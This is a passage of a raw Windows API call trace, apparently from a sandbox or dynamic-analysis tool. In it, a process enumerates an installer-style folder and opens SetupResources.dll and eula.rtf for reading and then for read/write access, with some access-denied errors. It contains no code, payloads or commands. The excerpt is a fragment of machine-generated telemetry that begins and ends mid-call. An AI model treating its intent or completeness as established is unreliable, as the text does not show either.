InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.786] AreFileApisANSI () returned 1 [0061.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0061.787] AreFileApisANSI () returned 1 [0061.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 46 [0061.787] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.787] GetFileType (hFile=0x41c) returned 0x1 [0061.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.787] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.787] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.787] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.788] CloseHandle (hObject=0x41c) returned 1 [0061.788] AreFileApisANSI () returned 1 [0061.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 46 [0061.788] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.788] GetFileType (hFile=0x41c) returned 0x1 [0061.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.788] CloseHandle (hObject=0x41c) returned 1 [0061.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.789] AreFileApisANSI () returned 1 [0061.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0061.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 46 [0061.789] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758)) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.789] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46590, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓㝘")) returned 0 [0061.789] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0061.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.790] AreFileApisANSI () returned 1 [0061.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3082", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3082", lpUsedDefaultChar=0x0) returned 27 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.790] AreFileApisANSI () returned 1 [0061.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x781d0 [0061.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x781d0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082") returned 27 [0061.791] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082" (normalized: "c:\\588bce7c90097ed212\\3082"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.791] GetLastError () returned 0x5 [0061.791] GetLastError () returned 0x5 [0061.791] SetLastError (dwErrCode=0x5) [0061.791] GetLastError () returned 0x5 [0061.791] SetLastError (dwErrCode=0x5) [0061.791] GetLastError () returned 0x5 [0061.791] SetLastError (dwErrCode=0x5) [0061.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x781d0 | out: hHeap=0x20000) returned 1 [0061.791] AreFileApisANSI () returned 1 [0061.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78610 [0061.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x78610, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082") returned 27 [0061.791] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082" (normalized: "c:\\588bce7c90097ed212\\3082"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.791] GetLastError () returned 0x5 [0061.791] GetLastError () returned 0x5 [0061.791] SetLastError (dwErrCode=0x5) [0061.791] GetLastError () returned 0x5 [0061.791] SetLastError (dwErrCode=0x5) [0061.791] GetLastError () returned 0x5 [0061.791] SetLastError (dwErrCode=0x5) [0061.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78610 | out: hHeap=0x20000) returned 1 [0061.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0061.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.792] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Client", cAlternateFileName="")) returned 1 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.792] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78250 [0061.792] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.792] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0061.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0061.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0061.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0061.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.793] AreFileApisANSI () returned 1 [0061.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3082\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.793] AreFileApisANSI () returned 1 [0061.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b30 [0061.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68b30, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 36 [0061.794] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.794] GetFileType (hFile=0x41c) returned 0x1 [0061.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0061.794] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.794] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.794] SetFilePointerEx (in: 